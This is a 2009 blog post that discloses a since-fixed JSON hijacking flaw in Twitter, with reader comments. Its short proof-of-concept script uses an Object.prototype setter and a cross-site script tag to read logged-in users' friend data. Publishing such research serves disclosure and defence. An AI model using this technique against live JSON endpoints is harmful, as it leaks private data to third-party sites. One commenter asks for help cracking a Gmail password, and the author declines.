Skip to content

I know what your friends did last summer

I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter JSON security is leaking data, the JSON feeds that are publically available shouldn’t be IMO or at least protected using known methods.

So if you use Twitter a web site can know who you are and who your friends are. Spammers could you this data to automate targeted spamming attacks or maybe automated social engineering, you’re more like to open a email attachment off your friends right?

The attack works by including the JSON data using a script tag on any web site, using setters you can get the data of the JSON feed in every browser except IE (in my testing).

<script>
Object.prototype.__defineSetter__('user',function(obj){for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
</script>

Originally I thought it was a bug in Firefox, that’s why I’ve used Object.prototype and not simply Object but I found a post by Joe Walker which uses a far better technique to grab all the data.

Here is the proof of concept to prove I do know what your friends did last summer:-
twitter json hack

Share and Enjoy:
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 8

  1. thornmaker wrote:

    how about document.write() instead of alert() for your PoC? :)

    Posted 07 Jan 2009 at 5:23 pm
  2. Gareth Heyes wrote:

    LOL nah I like annoying people :) plus I can’t be bothered changing it now

    Posted 07 Jan 2009 at 5:36 pm
  3. Gareth Heyes wrote:

    * Note You need to be logged into twitter using https in order for the POC to work correct

    Posted 07 Jan 2009 at 5:38 pm
  4. Gareth Heyes wrote:

    Twitter has now fixed the problem whoo hoo

    Posted 13 Jan 2009 at 9:19 am
  5. Giorgio Maone wrote:

    Get NoScript 1.8.8.95 from http://noscript.net/getit#devel :)

    http://hackademix.net/2009/01/13/you-dont-know-what-my-twitter-leaks/

    http://hackademix.net/2009/01/13/twitter-json-hijacking-updates/

    Posted 13 Jan 2009 at 10:34 am
  6. Pete wrote:

    Hi Gareth
    I found your name and information on the Security Planet website. Can you help me, or do you know someone who can help me, to crack a gmail password?
    Thanks
    Pete

    Posted 26 Feb 2009 at 9:29 am
  7. Gareth Heyes wrote:

    @Pete

    I think you misunderstood what I actually do. I’m a security researcher.

    Posted 26 Feb 2009 at 9:52 am
  8. Frank Polenose wrote:

    I had to have a chuckle at Petes comment! Cheered me right up!

    Posted 21 May 2009 at 4:23 pm

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam